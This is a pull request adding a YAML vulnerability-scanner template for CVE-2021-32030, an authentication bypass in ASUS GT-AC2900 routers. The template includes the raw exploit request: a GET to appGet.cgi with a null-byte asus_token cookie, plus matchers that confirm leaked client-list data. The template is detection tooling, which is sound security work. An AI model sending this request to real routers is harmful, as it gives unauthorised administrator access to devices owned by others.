### PR TITLE
Create CVE-2021-32030.yaml

### DIFF
--- a/cves/2021/CVE-2021-32030.yaml
+++ b/cves/2021/CVE-2021-32030.yaml
@@ -2,11 +2,10 @@ id: CVE-2021-32030
 
 info:
   name: ASUS GT-AC2900 - Authentication Bypass
-  description: The administrator application on ASUS GT-AC2900 devices before 3.0.0.4.386.42643 allows authentication bypass when processing remote input from an unauthenticated user, leading to unauthorized access to the administrator interface. This relates to handle_request in router/httpd/httpd.c and auth_check in web_hook.o. An attacker-supplied value of '\0' matches the device's default value of '\0' in some situations.
   author: gy741
   severity: high
-  reference: |
-    - https://www.atredis.com/blog/2021/4/30/asus-authentication-bypass
+  description: The administrator application on ASUS GT-AC2900 devices before 3.0.0.4.386.42643 allows authentication bypass when processing remote input from an unauthenticated user, leading to unauthorized access to the administrator interface. This relates to handle_request in router/httpd/httpd.c and auth_check in web_hook.o. An attacker-supplied value of '\0' matches the device's default value of '\0' in some situations.
+  reference: https://www.atredis.com/blog/2021/4/30/asus-authentication-bypass
   tags: cve,cve2021,asus,auth-bypass,router
 
 requests:

--- a/cves/2021/CVE-2021-32030.yaml
+++ b/cves/2021/CVE-2021-32030.yaml
@@ -1,0 +1,38 @@
+id: CVE-2021-32030
+
+info:
+  name: ASUS GT-AC2900 - Authentication Bypass
+  description: The administrator application on ASUS GT-AC2900 devices before 3.0.0.4.386.42643 allows authentication bypass when processing remote input from an unauthenticated user, leading to unauthorized access to the administrator interface. This relates to handle_request in router/httpd/httpd.c and auth_check in web_hook.o. An attacker-supplied value of '\0' matches the device's default value of '\0' in some situations.
+  author: gy741
+  severity: high
+  reference: |
+    - https://www.atredis.com/blog/2021/4/30/asus-authentication-bypass
+  tags: cve,cve2021,asus,auth-bypass,router
+
+requests:
+  - raw:
+      - |
+        GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: asusrouter--
+        Connection: close
+        Referer: {{BaseURL}}
+        Cookie: asus_token=\0Invalid; clickedItem_tab=0
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: header
+        words:
+          - application/json
+
+      - type: word
+        words:
+          - "get_cfg_clientlist"
+          - "alias"
+          - "model_name"
+        condition: and


### PR DESCRIPTION
### Template / PR Information

Hello

Added CVE-2021-32030

```
The administrator application on ASUS GT-AC2900 devices before 3.0.0.4.386.42643 allows authentication bypass when processing remote input from an unauthenticated user, leading to unauthorized access to the administrator interface. This relates to handle_request in router/httpd/httpd.c and auth_check in web_hook.o. An attacker-supplied value of '\0' matches the device's default value of '\0' in some situations.
```

- References: https://www.atredis.com/blog/2021/4/30/asus-authentication-bypass

### Template Validation

I've validated this template locally?
- [ ] YES
- [v] NO